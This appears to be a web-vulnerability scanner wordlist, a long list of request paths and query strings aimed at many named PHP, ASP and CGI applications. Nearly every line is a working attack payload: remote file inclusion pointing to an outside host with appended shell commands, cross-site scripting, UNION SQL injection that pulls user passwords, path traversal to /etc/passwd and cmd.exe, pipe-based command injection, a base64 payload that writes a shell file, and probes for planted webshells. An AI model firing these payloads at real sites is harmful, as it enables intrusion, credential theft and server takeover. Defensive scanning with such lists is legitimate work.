dotproject/modules/projectdesigner/gantt.php?dPconfig[root_dir]=http://www.yxlink.com/nvs_test.txt
down.asp?filename=../conn.asp%20
down/html/?88'.html
download.php?op=viewdownload
download.php?root_prefix=http://www.yxlink.com/nvs_test.txt
download.php?sortby=&dcategory=<script>alert('Vulnerable')</script>
download/
download_engine_V1.4.3/addmember.php?eng_dir=http://www.yxlink.com/nvs_test.txt
download_engine_V1.4.3/admin/enginelib/class.phpmailer.php?lang_pathr=http://www.yxlink.com/nvs_test.txt
download_engine_V1.4.3/admin/includes/spaw/dialogs/colorpicker.php?spaw_root=http://www.yxlink.com/nvs_test.txt
downloads/
downloads/pafiledb.php?action=download&id=4?\x5C\x22&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\x5C\x22
downloads/pafiledb.php?action=email&id=4?\x5C\x22&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\x5C\x22
downloads/pafiledb.php?action=rate&id=4?\x5C\x22&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\x5C\x22
downstat1.8/chart.php?art=http://www.yxlink.com/nvs_test.txt?
dp_logs.php?HomeDir=http://www.yxlink.com/nvs_test.txt
dynamic/
e.php
e/class/checklevel.php?check_path=http://www.yxlink.com/nvs_test.txt
e/data/ecmseditor/infoeditor/epage/TranFile.php?InstanceName=\x22><script>alert(123)</script>
e107_admin/download.php?cat.edit.999999%0Aunion%0Aselect%0Amd5(333),md5(333),md5(333),md5(333),md5(333),md5(333),md5(333)
e107_admin/wmessage.php?create.edit.999999%0Aunion%0Aselect%0A1,2,md5(333)
e107_config.php?cmd=id
eWebEditorNet/admin/login.aspx
eWebEditorNet/admin_login.aspx
eXPerience2/modules.php?file=http://www.yxlink.com/nvs_test.txt
ea-gBook/index_inc.php?inc_ordner=http://www.yxlink.com/nvs_test.txt?&act=cmd&cmd=whoami&d=/&submit=1&cmd_txt=1
eccredit.php?action=list&uid=\x22><script>alert(111);</script>
edit.php?javascript_path=http://www.yxlink.com/nvs_test.txt?
edit/admin_uploadfile.asp?id=&dir=../../.
edit_comment.aspx?id=48&amp;bug_id=3%3E%3Cscript%3Ealert%28%27%27%29;%3C/script%3E
editor.php?newsfile=http://www.yxlink.com/nvs_test.txt
editor/admin_login.asp
editor/admin_login.aspx
editor/admin_login.php
editor/eWebEditorNet/admin/login.aspx
editor/eWebEditorNet/admin_login.aspx
editor/login.asp
editor/login.aspx
editor/login.php
editprofile.php?pathtohomedir=http://www.yxlink.com/nvs_test.txt?
editsite.php?returnpath=http://www.yxlink.com/nvs_test.txt
edittag/edittag.cgi?file=%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd
editx/add_address.php?include_dir=http://www.yxlink.com/nvs_test.txt
efiction/titles.php?action=viewlist&let=<script>alert(document.cookie)</script>
ejs/%3Cscript%3Ealert%281%29%3C/script%3E
ekgnkm/AccessCodeStart.asp?msg=%3Cscript%3Ealert(%22XSS%22);%3C/script%3E
elseif/contenus.php?contenus=http://www.yxlink.com/nvs_test.txt
elseif/moduleajouter/articles/fonctions.php?tpelseifportalrepertoire=http://www.yxlink.com/nvs_test.txt
elseif/moduleajouter/articles/usrarticles.php?corpsdesign=http://www.yxlink.com/nvs_test.txt
elseif/moduleajouter/depot/fonctions.php?tpelseifportalrepertoire=http://www.yxlink.com/nvs_test.txt
elseif/moduleajouter/depot/usrdepot.php?corpsdesign=http://www.yxlink.com/nvs_test.txt
elseif/moduleajouter/depot/usrdepot.php?corpsdesignhttp://www.yxlink.com/nvs_test.txt
elseif/utilisateurs/coeurusr.php?tpelseifportalrepertoire=http://www.yxlink.com/nvs_test.txt
elseif/utilisateurs/commentaire.php?tpelseifportalrepertoire=http://www.yxlink.com/nvs_test.txt
elseif/utilisateurs/enregistrement.php?tpelseifportalrepertoire=http://www.yxlink.com/nvs_test.txt
elseif/utilisateurs/espaceperso.php?tpelseifportalrepertoire=http://www.yxlink.com/nvs_test.txt
elseif/utilisateurs/votes.php?tpelseifportalrepertoire=http://www.yxlink.com/nvs_test.txt
email.php?login=attacker&cer_skin=/etc/passwd
email_subscribe.php?root_prefix=http://www.yxlink.com/nvs_test.txt
emailfriend/emailarticle%20php?submit=submit&email&youremail=webmaster%20hackingzone%20org&id=100UNION%20select%20md5(333),email,password%20from%20mos_users%20where%20id=1
emailfriend/emailarticle.php?id=\x5C\x22<script>alert(document.cookie)</script>
emailfriend/emailfaq.php?id=\x5C\x22<script>alert(document.cookie)</script>
emailfriend/emailnews.php?id=\x5C\x22<script>alert(document.cookie)</script>
embed/day.php?path=http://www.yxlink.com/nvs_test.txt
empower?DB=whateverwhatever
enc/content.php?Home_Path=http://www.yxlink.com/nvs_test.txt?
engine/Ajax/editnews.php?root_dir=http://www.yxlink.com/nvs_test.txt
engine/api/api.class.php?dle_config_api=http://www.yxlink.com/nvs_test.txt?
engine/engine.inc.php?absolute_path=http://www.yxlink.com/nvs_test.txt
engine/init.php?root_dir=http://www.yxlink.com/nvs_test.txt
engine/oldnews.inc.php?addpath=http://www.yxlink.com/nvs_test.txt
engine/require.php?MY_ENV[BASE_ENGINE_LOC]=http://www.yxlink.com/nvs_test.txt?
entete.php?subpath=http://www.yxlink.com/nvs_test.txt
enteteacceuil.php?subpath=@RFIUR
enth3/show_joined.php?path=http://www.yxlink.com/nvs_test.txt
environ.pl
environ.pl?param1=<script>alert(document.cookie)</script>
environment.php?DIR_PREFIX=http://www.yxlink.com/nvs_test.txt
epal/index.php?view=http://www.yxlink.com/nvs_test.txt?
erba/start/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
error.php?default_path=http://www.yxlink.com/nvs_test.txt
error.php?e=<script>(333)</script> .
error/500error.jsp?et=1<script>alert('Vulnerable')</script>;
error/HTTP_NOT_FOUND.html.var
error_log/
errors.php?error=http://www.yxlink.com/nvs_test.txt
errors/configmode.php?GALLERY_BASEDIR=http://www.yxlink.com/nvs_test.txt
errors/needinit.php?GALLERY_BASEDIR=http://www.yxlink.com/nvs_test.txt
errors/reconfigure.php?GALLERY_BASEDIR=http://www.yxlink.com/nvs_test.txt
errors/unconfigured.php?GALLERY_BASEDIR=http://www.yxlink.com/nvs_test.txt
es_custom_menu.php?files_dir=http://www.yxlink.com/nvs_test.txt
es_desp.php?files_dir=http://www.yxlink.com/nvs_test.txt
es_offer.php?files_dir=http://www.yxlink.com/nvs_test.txt
eshop.pl/seite=;cat%20eshop.pl|
eshow.php?Config_rootdir=http://www.yxlink.com/nvs_test.txt
esp?PAGE=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
estateagent.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
esupport/admin/autoclose.php?subd=http://www.yxlink.com/nvs_test.txt?
etc/passwd
eva/index.php3?aide=http://www.yxlink.com/nvs_test.txt
eva/index.php3?perso=http://www.yxlink.com/nvs_test.txt
eva/index.php?eva[caminho]=http://www.yxlink.com/nvs_test.txt
event.php?myevent_path=http://www.yxlink.com/nvs_test.txt
event_cal/module/embed/day.php?path=http://www.yxlink.com/nvs_test.txt
eventcal/mod_eventcal.php?lm_absolute_path=http://www.yxlink.com/nvs_test.txt
eventcal2.php.php?path_simpnews=http://www.yxlink.com/nvs_test.txt
events.php?nav_time=-1+UNION+ALL+SELECT+md5(333),md5(333),md5(333),md5(333),md5(333),md5(333),md5(333)+from+events--
eventscroller.php?path_simpnews=http://www.yxlink.com/nvs_test.txt
eventum/forgot_password.php?email=\x5C\x22><script>alert(document.cookie)</script>
eventum/index.php?err=3&email=\x5C\x22><script>alert(document.cookie)</script>
eweb/admin/login.asp
eweb/admin/login.aspx
eweb/admin/login.jsp
eweb/admin/login.php
eweb/admin_login.asp
eweb/admin_login.aspx
eweb/admin_login.jsp
eweb/admin_login.php
ewebeditor/admin/login.aspx
ewebeditor/admin/login.php
ewebeditor/admin_login.asp
ewebeditor/admin_login.aspx
ewebeditor/admin_login.php
ewebeditor/login.asp
example-view/templates/article.php?globals[content_dir]=http://www.yxlink.com/nvs_test.txt?
example-view/templates/dates_list.php?globals[content_dir]=http://www.yxlink.com/nvs_test.txt?
example-view/templates/root.php?globals[content_dir]=http://www.yxlink.com/nvs_test.txt?
example.php?site=http://www.yxlink.com/nvs_test.txt
example/gamedemo/inc.functions.php?projectPath=http://www.yxlink.com/nvs_test.txt?
exampleext/control/ManagePortalPages?parentPortalPageId=\x22><script>alert(222)</script>
examplefile.php?bibtexrootrel=http://www.yxlink.com/nvs_test.txt?
examples/
examples/basic/servlet/HelloServlet
examples/context
examples/cookie
examples/forward1
examples/forward2
examples/header
examples/include1
examples/info
examples/jsp/cal/cal2.jsp?time=<script>alert(123)</script>
examples/jsp/index.html
examples/jsp/snp/snoop.jsp
examples/jsp/source.jsp??
examples/patExampleGen/bbcodeSource.php?example=http://www.yxlink.com/nvs_test.txt
examples/servlet/TroubleShooter
examples/servlets/index.html
examples/session
examplesWebApp/InteractiveQuery.jsp?person=<script>alert('Vulnerable')</script>
exception/include.php?_APP_RELATIVE_PATH=http://www.yxlink.com/nvs_test.txt
exchange/lib/AMPROPS.INC
exchange/lib/ATTACH.INC
exchange/lib/DELETE.INC
exchange/lib/GETREND.INC
exchange/lib/GETWHEN.INC
exchange/lib/JSATTACH.INC
exchange/lib/JSROOT.INC
exchange/lib/JSUTIL.INC
exchange/lib/LANG.INC
exchange/lib/PAGEUTIL.INC
exchange/lib/PUBFLD.INC
exchange/lib/RENDER.INC
exchange/lib/SESSION.INC
exchange/lib/logon.inc
exchange/root.asp?acs=anon
excite;IFS=\x5C\x22$\x5C\x22;/bin/cat /etc/passwd
exec/show/config/cr
extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.yxlink.com/nvs_test.txt
externalredirect.php?url=\x22><script>alert(222)</script>
extmail/cgi/env.cgi
extmail/cgi/index.cgi?__mode=<script>alert(123)</script>
extras/mt.php?web_root=http://www.yxlink.com/nvs_test.txt
extras/poll/poll.php?file_newsportal=http://www.yxlink.com/nvs_test.txt
ezhttpbench.php?AnalyseSite=/etc/passwd&NumLoops=1
ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|
ezusermanager_pwd_forgott.php?ezUserManager_Path=http://www.yxlink.com/nvs_test.txt
f.php
f/ajax.php?do=inforum&listforumid=100%29%20UNION%20SELECT%201,concat_ws%280x7c,md5%28333%29,database%28%29,version%28%29%29,3,4,5,6,7,8,9,10--%20&result=20
faks.php
faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20%28select%20%28select%20concat%28md5(333),0x27,md5(444)%29%20from%20information_schema.SCHEMATA%20limit%201%29%20%29%20from%20%60information_schema%60.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
faq.php?acuparam=>\x22><ScRiPt>alert(213771818860)</ScRiPt>
faq.php?module_root_path=http://www.yxlink.com/nvs_test.txt
faq.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
faqman/index.php?op=view&t=518\x22><script>alert(333)</script>
faqmanager.cgi?toc=/etc/passwd%00
favicon.ico
faxsurvey?cat%20/etc/passwd
fcgi-bin/echo
fcgi-bin/echo.exe?foo=<script>alert('Vulnerable')</script>
fcgi-bin/echo2
fcgi-bin/echo2.exe?foo=<script>alert('Vulnerable')</script>
fcgi-bin/echo2?foo=<script>alert('Vulnerable')</script>
fcgi-bin/echo?foo=<script>alert('Vulnerable')</script>
fckeditor/editor/dialog/fck_link.php?dirroot=http://www.yxlink.com/nvs_test.txt
fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Dirroot=http://www.yxlink.com/nvs_test.txt
fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?dirroot=http://www.yxlink.com/nvs_test.txt?&cmd=id
fcring.php?s_fuss=http://www.yxlink.com/nvs_test.txt
feed.php?config[root_ordner]=http://www.yxlink.com/nvs_test.txt?&cmd=id
feed/index2.php?m=http://www.yxlink.com/nvs_test.txt
fetchmailprefs.php?actionID=fetchmail_prefs_save&fm_driver=imap&fm_id=zzz%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%3Cx+y%3D%22&fm_protocol=pop3&fm_lmailbox=INBOX&save=Create
fi?/etc/passwd
file-that-is-not-real-2002.php3
filemanager/filemanager_forms.php?lib_path=http://www.yxlink.com/nvs_test.txt
filemgmt/brokenfile.php?lid=17\x22><script>alert(333)</script>
filemgmt/singlefile.php?lid=17'
filemgmt/viewcat.php?cid='6
filemgmt/visit.php?lid=1'1'0
files/amazon-bestsellers.php?CarpPath=http://www.yxlink.com/nvs_test.txt
files/carprss.php?CarpPath=http://www.yxlink.com/nvs_test.txt
files/compose-attach.php3?BSX_LIBDIR=http://www.yxlink.com/nvs_test.txt
files/compose-menu.php3?BSX_LIBDIR=http://www.yxlink.com/nvs_test.txt
files/compose-new.php3?BSX_LIBDIR=http://www.yxlink.com/nvs_test.txt
files/compose-send.php3?BSX_LIBDIR=http://www.yxlink.com/nvs_test.txt
files/folder-create.php3?BSX_LIBDIR=http://www.yxlink.com/nvs_test.txt
files/folder-delete.php3?BSX_LIBDIR=http://www.yxlink.com/nvs_test.txt
files/folder-empty.php3?BSX_LIBDIR=http://www.yxlink.com/nvs_test.txt
files/folder-rename.php3?BSX_LIBDIR=http://www.yxlink.com/nvs_test.txt
files/folders.php3?BSX_LIBDIR=http://www.yxlink.com/nvs_test.txt
files/login.php3?err=hack&BSX_HTXDIR=http://www.yxlink.com/nvs_test.txt
files/mainfile.php?page[path]=http://www.yxlink.com/nvs_test.txt?&cmd=ls
files/mbox-list.php3?BSX_LIBDIR=http://www.yxlink.com/nvs_test.txt
files/message-delete.php3?BSX_LIBDIR=http://www.yxlink.com/nvs_test.txt
files/message-forward.php3?BSX_LIBDIR=http://www.yxlink.com/nvs_test.txt
files/message-header.php3?BSX_LIBDIR=http://www.yxlink.com/nvs_test.txt
files/message-print.php3?BSX_LIBDIR=http://www.yxlink.com/nvs_test.txt
files/message-read.php3?BSX_LIBDIR=http://www.yxlink.com/nvs_test.txt
files/message-reply.php3?BSX_LIBDIR=http://www.yxlink.com/nvs_test.txt
files/message-replyall.php3?BSX_LIBDIR=http://www.yxlink.com/nvs_test.txt
files/message-search.php3?BSX_LIBDIR=http://www.yxlink.com/nvs_test.txt
findix/index.php?page=http://www.yxlink.com/nvs_test.txt?&cmd=id
firewall/policy/dlg?q=-1&fzone=t<script>alert('Vulnerable')</script>>&tzone=dmz
firewall/policy/policy?fzone=internal&tzone=dmz1<script>alert('Vulnerable')</script>
fishcart_v3/fc_functions/fc_example.php?docroot=http://www.yxlink.com/nvs_test.txt
fix1.php
flash_upload.php?modelid=1%20and%20%28select%201%20from%28select%20count%28*%29,concat%280x7c,%28select%20concat%280x7c,md5(333333)%29%20from%20phpcms_member%20limit%200,1%29,0x7c,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1%29a%29%23
flushcmd/Include/editor/rich_files/class.rich.php?class_path=http://www.yxlink.com/nvs_test.txt?
follow.php?forum_id=1&,f00=bar,1=-99%20UNION%20ALL%20SELECT%201%2c1%2c1%2c1%2c1%2cCONCAT(md5(333)%2c%27|%27%2cpassword)%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%20FROM%20phorum_users%20WHERE%20admin=1
fom.cgi?file=<script>alert('Vulnerable')</script>
fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable
fonctions/template.php?repphp=http://www.yxlink.com/nvs_test.txt?
fonctions_racine.php?chemin_lib=http://www.yxlink.com/nvs_test.txt
foo.php3
footer.inc.php?settings[footer]=http://www.yxlink.com/nvs_test.txt
footer.inc.php?tfooter=http://www.yxlink.com/nvs_test.txt
footer.php
footer.php?footer_file=http://www.yxlink.com/nvs_test.txt
footer.php?op[footer_body]=http://www.yxlink.com/nvs_test.txt?
foots.php
forgot_password.php?email=\x5C\x22><script>alert(document.cookie)</script>
form.php?path=http://www.yxlink.com/nvs_test.txt?&cmd=pwd
formmail
formmail.cgi
formmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
formmail.pl
formmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
formmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
forum.php?acuparam=>\x22><ScRiPt>alert(213771818860)</ScRiPt>
forum.php?cfg_file=1&fpath=http://www.yxlink.com/nvs_test.txt?
forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4NEU1NjUzNUY1NDQ1NTM1NCxwYXNzd29yZCkgZnJvbSBwcmVfY29tbW9uX21lbWJlciB3aGVyZSAgdXNlcm5hbWUgbGlrZSAnYWRtaW58eHx5
forum/forum.php?view=http://www.yxlink.com/nvs_test.txt
forum/forum82lib.php3?repertorylevel=http://www.yxlink.com/nvs_test.txt?
forum/forum_admin.php?create.edit.9999999%0Aunion%0Aselect%0A1,2,md5(333),4,5,6,7,8,9,10,11,12,13,14
forum/gesfil.php?repertorylevel=http://www.yxlink.com/nvs_test.txt?
forum/include/common.php?pun_root=http://www.yxlink.com/nvs_test.txt
forum/index.php?method=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;
forum/lostpassword.php?repertorylevel=http://www.yxlink.com/nvs_test.txt?
forum/mail.php?repertorylevel=http://www.yxlink.com/nvs_test.txt?
forum/member.php?repertorylevel=http://www.yxlink.com/nvs_test.txt?
forum/memberlist.php?s=23c37cf1af5d2ad05f49361b0407ad9e&what=\x5C\x22>\x5C\x22<script>javascript:alert(document.cookie)</script>
forum/message.php?repertorylevel=http://www.yxlink.com/nvs_test.txt?
forum/misc.php?action=hmflags&cnam=-Belgium'+UNION%20SELECT%201,group_concat(md5(333),0x3a,password,0x3a,salt,0x3b),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164+FROM+mybb_users%20WHERE%20uid=1--+&pf=5
forum/search.php?repertorylevel=http://www.yxlink.com/nvs_test.txt?
forum/track.php?path=http://www.yxlink.com/nvs_test.txt
forum_members.asp?find=%22;}alert('Vulnerable');function%20x(){v%20=%22
forumdisplay.php?GLOBALS[]=1&f=2&comma=\x5C\x22.system('id').\x5C\x22
forumdisplay.php?acuparam=>\x22><ScRiPt>alert(2112)</ScRiPt>
forummission.php?index=show&amp;id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,MD5(333),0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--
forummission.php?index=show&id=24%27
forums/browse.php?fid=3&tid=46&go=<script>JavaScript:alert('Vulnerable');</script>
forums/index.php?board=;action=login2&user=USERNAME&cookielength=120&passwrd=PASSWORD<script>alert('Vulnerable')</script>
forums/index.php?top_message=&lt;script&gt;alert(document.cookie)&lt;/script&gt; 
forums/member.php?action=profile&uid=\xE2\x80\x98
forumscalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
forumzcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
frame.php?framefile=http://www.yxlink.com/nvs_test.txt
friend.php?op=SiteSent&fname=<script>alert('Vulnerable')</script>
frontend/x/net/dnslook.html?dns=\x22><script>alert(666)</script>
frontend/x3/files/fileop.html?opdir=[PATH]&opfile=[FILENAME]&fileop=\x22><script>alert(222)</script>
frontpage.php?setup_folder=http://www.yxlink.com/nvs_test.txt
frontpage.php?setup_folder=shell.txt?
ftb.imagegallery.aspx?frame=1&rif=..&cif=\x5C..
ftp.php?path_local=http://www.yxlink.com/nvs_test.txt
fuck.php
function.inc.php?path=http://www.yxlink.com/nvs_test.txt
function.php?adminfolder=http://www.yxlink.com/nvs_test.txt
function.php?gbpfad=http://www.yxlink.com/nvs_test.txt
functions.php?include_path=http://www.yxlink.com/nvs_test.txt
functions.php?pmp_rel_path=http://www.yxlink.com/nvs_test.txt
functions.php?s[phppath]=http://www.yxlink.com/nvs_test.txt
functions.php?set_path=http://www.yxlink.com/nvs_test.txt?
functions/form.func.php?GLOBALS[PTH][classes]=http://www.yxlink.com/nvs_test.txt?
functions/general.func.php?GLOBALS[PTH][classes]=http://www.yxlink.com/nvs_test.txt?
functions/groups.func.php?GLOBALS[PTH][classes]=http://www.yxlink.com/nvs_test.txt?
functions/js.func.php?GLOBALS[PTH][classes]=http://www.yxlink.com/nvs_test.txt?
functions/prepend_adm.php?SETS[path][physical]=http://www.yxlink.com/nvs_test.txt
functions/sections.func.php?GLOBALS[PTH][classes]=http://www.yxlink.com/nvs_test.txt?
functions/users.func.php?GLOBALS[PTH][classes]=http://www.yxlink.com/nvs_test.txt?
functions_mod_user.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt?&cmd=ls
fusebox5.php?FUSEBOX_APPLICATION_PATH=http://www.yxlink.com/nvs_test.txt
g.php
galerie.php?config[root_ordner]=http://www.yxlink.com/nvs_test.txt?cmd=id
gallery/captionator.php?GALLERY_BASEDIR=http://www.yxlink.com/nvs_test.txt
gallery/errors/configmode.php?GALLERY_BASEDIR=http://www.yxlink.com/nvs_test.txt
gallery/errors/reconfigure.php?GALLERY_BASEDIR=http://www.yxlink.com/nvs_test.txt
gallery/errors/unconfigured.php?GALLERY_BASEDIR=http://www.yxlink.com/nvs_test.txt
gallery/folderview.asp?folder=<script>alert (3333)</script>
gallery/lib/content.php?include=http://www.yxlink.com/nvs_test.txt?cmd=ls
gallery/theme/include_mode/template.php?galleryfilesdir=http://www.yxlink.com/nvs_test.txt
gallerypath/index.php?includepath=http://www.yxlink.com/nvs_test.txt
games.php?id=http://www.yxlink.com/nvs_test.txt
games.php?scoreid=http://www.yxlink.com/nvs_test.txt
ganglia/
gb/form.inc.php3?lang=http://www.yxlink.com/nvs_test.txt
gbook/includes/header.php?abspath=http://www.yxlink.com/nvs_test.txt?
gcms/code/error.php?path_prefix=http://www.yxlink.com/nvs_test.txt
gemini/page/forums/bottom.php?lang=http://www.yxlink.com/nvs_test.txt?
gen_m3u.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
genepi.php?topdir=http://www.yxlink.com/nvs_test.txt
general/crm/studio/modules/EntityRelease/release.php?entity_name=1%d5'%20or%20sys_function.FUNC_ID=1%23%20${%20fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(bnZzX3Rlc3RfZ2V0d2Vic2hlbGw))}
general/email/index.php
general/email/shell.php
generate.php?ht_pfad=http://www.yxlink.com/nvs_test.txt?
genpage-cgi.php?REP_INC=http://www.yxlink.com/nvs_test.txt
gepi/gestion/savebackup.php?filename=http://www.yxlink.com/nvs_test.txt&cmd=cat/etc/passwd
gestArt/aide.php3?aide=http://www.yxlink.com/nvs_test.txt?
getPass.php?email=test@test.com&update=s
get_od_toc.pl?Profile=
get_session_vars.php?path_to_smf=http://www.yxlink.com/nvs_test.txt
getpage.php?page=online&doc_path=http://www.yxlink.com/nvs_test.txt
global.asa
global.php?abs_path=http://www.yxlink.com/nvs_test.txt?
go.cgi?artarchive=|id|
goform/CheckLogin?login=root&password=tslinux
gorum/dbproperty.php?appDirName=http://www.yxlink.com/nvs_test.txt
gov/m_5_9/downfile.jsp?filename=/etc/passwd&savename=1
gpb/include/db.mysql.inc.php?root_path=http://www.yxlink.com/nvs_test.txt
gpb/include/gpb.inc.php?root_path=http://www.yxlink.com/nvs_test.txt
graph.php?DOCUMENT_ROOT=http://www.yxlink.com/nvs_test.txt?
group-summary.jsp?search=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E<!--
group/search.php?sad=g&keyword=%cf'
groups_profile.php?gid=311\x22><script>alert(222)</script>
gruppen.php?config[root_ordner]=http://www.yxlink.com/nvs_test.txt?&cmd=id
guanli/
guanliyuan/
guest/Ask/MyAskList.aspx?QueType=1%27%20union%20select%201,str%28123.4,8,4%29,3,4,5,6,88888888-1,8,9,10,11%20from%20sysobjects--
guestbook.cgi?user=cpanel&template=|/bin/cat%20/etc/passwd|
guestbook/guestbook.html
guides/index.php?lang=0&CODE=02&id=1'
h.php
h0umen.php
hack.php
hack.php?H_name=bank\x22><script>alert(111)</script>
hacker.php
handlers/email/mod.listmail.php?_PM_[path][handle]=http://www.yxlink.com/nvs_test.txt
handlers/page/show.php?sous_rep=http://www.yxlink.com/nvs_test.txt
head.php?APB_SETTINGS%5Btemplate_path%5D=http://www.yxlink.com/nvs_test.txt
head.php?CONFIG[MWCHAT_Libs]=http://www.yxlink.com/nvs_test.txt?
header.inc.php?CssFile=http://www.yxlink.com/nvs_test.txt
header.php?path=http://www.yxlink.com/nvs_test.txt
header.php?wwwRoot=http://www.yxlink.com/nvs_test.txt
headeruserdata.php?groupname='%20UNION SELECT md5(333)%20FROM%20authors%23
help.html
help.php?CONFIG[MWCHAT_Libs]=http://www.yxlink.com/nvs_test.txt?
help.php?chapter=<script>alert('Vulnerable')</script>
help.php?css_path=http://www.yxlink.com/nvs_test.txt
help/
help/1%27
help/advanced/content.jsp?'onload='alert(0)
help/index.jsp?'onload='alert(0)
help/index.php?show=http://www.yxlink.com/nvs_test.txt
help/readme.nsf/Header?OpenPage=&BaseTarget=%22;//%20--%3E%3C/script%3E%3Cscript%3Ealert%28%27XSS%27%29;%3C/script%3E
help/wwhelp/wwhimpl/js/html/wwhelp.htm
help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=http://www.yxlink.com/nvs_test.txt
helperfunction.php?includedir=http://www.yxlink.com/nvs_test.txt
hioxBannerRotate.php?hm=http://www.yxlink.com/nvs_test.txt
hioxRandomAd.php?hm=http://www.yxlink.com/nvs_test.txt
hioxstats.php?hm=http://www.yxlink.com/nvs_test.txt
hioxupdate.php?hm=http://www.yxlink.com/nvs_test.txt
hit.php?url_hit=http://www.yxlink.com/nvs_test.txt?
hit.php?url_hithttp://www.yxlink.com/nvs_test.txt%00
holiday.php?hid=-2+union+select+1,2,3,md5(333),5,6,7,8+from+information_schema.tables+where+table_schema=database()--
holiday_book.php?hid=-2+union+select+1,2,3,md5(333),5,6,7,8+from+information_schema.tables+where+table_schema=database()--
home.php
home.php?a=http://www.yxlink.com/nvs_test.txt
home.php?arsc_language=elvish
home.php?genres_parent=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E
home.php?genres_parent=-1%20union/**/select/**/1,concat(MD5(333),%27%20%27,version()),3,4,5,6--
home.php?page=http://www.yxlink.com/nvs_test.txt
home.php?pagina=http://www.yxlink.com/nvs_test.txt
home/cache/cachedata.stat.php
home/www/images/doc/index2.php?type=http://www.yxlink.com/nvs_test.txt
home1.php?ln=http://www.yxlink.com/nvs_test.txt
home2.php?ln=http://www.yxlink.com/nvs_test.txt
homepage.php/admin/member-profile
horde/imp/test.php
horde/services/images/colorpicker.php?form=//--><script>alert('XSS')</script>
horde/test.php
horde/test.php?mode=phpinfo
host-manager/html/add?name=<script>alert(222)</script>&aliases=somealias
hostadmin/?page='
houmen.php
houtai/
hp-ux/
hp_docs/
hp_docs/cgi-bin/index.cgi
hp_docs/xmltools/
hpp/
hsList.php?subdir=http://www.yxlink.com/nvs_test.txt?&cmd=ls
htbin/
htdoc/
htdocs/gmapfactory/params.php?gszAppPath=http://www.yxlink.com/nvs_test.txt
htgrep?file=index.html&hdr=/etc/passwd
htim_enu/start.swe/?>'\x22><script>alert(111)</script>
htimage.exe/path/filename?2,2
html/
html/admin/modules/plugin_admin.php?_settings[pluginpath]=http://www.yxlink.com/nvs_test.txt
html/cgi-bin/cgicso?query=<script>alert('Vulnerable')</script>
html/cgi-bin/cgicso?query=AAA
html/chatheader.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script>
html/partner.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script>
html/sessions?path=/&sort=\x22><script>alert(33)</script>
htmltonuke.php?filnavn=http://www.yxlink.com/nvs_test.txt
htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'Vulnerable'%29%3B%3C%2Fscript%3E
htsearch?-c/nonexistant
htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=
htsearch?exclude=%60/etc/passwd%60
http_error/ 
https-admserv/bin/index?/<script>alert(document.cookie)</script>
hu/modules/reg-new/modstart.php?mod_dir=http://www.yxlink.com/nvs_test.txt?
hydd.php
i.php
i_head.php?home=http://www.yxlink.com/nvs_test.txt
i_nav.php?home=http://www.yxlink.com/nvs_test.txt
icons/
icons/README
ideabox/include.php?gorumDir=http://www.yxlink.com/nvs_test.txt
ideabox/include.php?ideaDir=http://www.yxlink.com/nvs_test.txt
idssvc/idssvc.jsp
ieccredit.php?action=list&uid=\x22><script>alert(123)</script>
iesvc/iesvc.jsp
iframe.php?file=http://www.yxlink.com/nvs_test.txt
iisadmpwd/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
iishelp/iis/htm/tutorial/redirect.asp
iishelp/iis/misc/default.asp
iissamples/exair/howitworks/Winmsdp.exe
